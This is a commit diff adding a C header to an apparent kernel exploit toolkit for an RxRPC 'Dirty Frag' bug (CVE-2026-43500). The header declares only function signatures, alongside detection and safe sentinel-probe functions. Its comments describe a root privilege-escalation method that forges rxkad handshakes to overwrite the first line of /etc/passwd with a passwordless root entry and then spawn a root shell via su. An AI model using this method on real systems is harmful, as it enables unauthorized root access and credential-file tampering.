Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL
This commit is contained in:
@@ -0,0 +1,34 @@
|
||||
/*
|
||||
* DIRTYFAIL — dirtyfrag_rxrpc.h
|
||||
*
|
||||
* RxRPC variant of Dirty Frag (CVE-2026-43500).
|
||||
*/
|
||||
|
||||
#ifndef DIRTYFAIL_DIRTYFRAG_RXRPC_H
|
||||
#define DIRTYFAIL_DIRTYFRAG_RXRPC_H
|
||||
|
||||
#include "common.h"
|
||||
|
||||
/* Precondition probe: kernel + rxrpc.ko + AF_RXRPC openable. */
|
||||
df_result_t dirtyfrag_rxrpc_detect(void);
|
||||
|
||||
/* Real PoC: brute-force three rxkad session keys K_A, K_B, K_C such
|
||||
* that pcbc(fcrypt)-decrypting /etc/passwd line 1 at offsets 4/6/8
|
||||
* with last-write-wins produces "root::0:0:GGGGGG:/root:/bin/bash".
|
||||
* Then enter a fresh user/net namespace, run the three forged-handshake
|
||||
* splice triggers, and (if do_shell) execve `su -` to drop a root shell
|
||||
* via PAM `pam_unix nullok`. */
|
||||
df_result_t dirtyfrag_rxrpc_exploit(bool do_shell);
|
||||
df_result_t dirtyfrag_rxrpc_exploit_inner(void);
|
||||
|
||||
/* Active probe: fires ONE rxkad handshake-forgery trigger against a
|
||||
* /tmp sentinel (never /etc/passwd). The trigger writes ~8 bytes of
|
||||
* pcbc(fcrypt)-decrypted ciphertext into the sentinel page; we don't
|
||||
* need to predict what landed — any byte change confirms the kernel
|
||||
* STORE happened. Skips fcrypt brute force entirely (a random 8-byte
|
||||
* key is fine for a structural probe). Returns DF_VULNERABLE if the
|
||||
* sentinel changed, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
|
||||
df_result_t dirtyfrag_rxrpc_active_probe(void);
|
||||
df_result_t dirtyfrag_rxrpc_active_probe_inner(void);
|
||||
|
||||
#endif
|
||||
Reference in New Issue
Block a user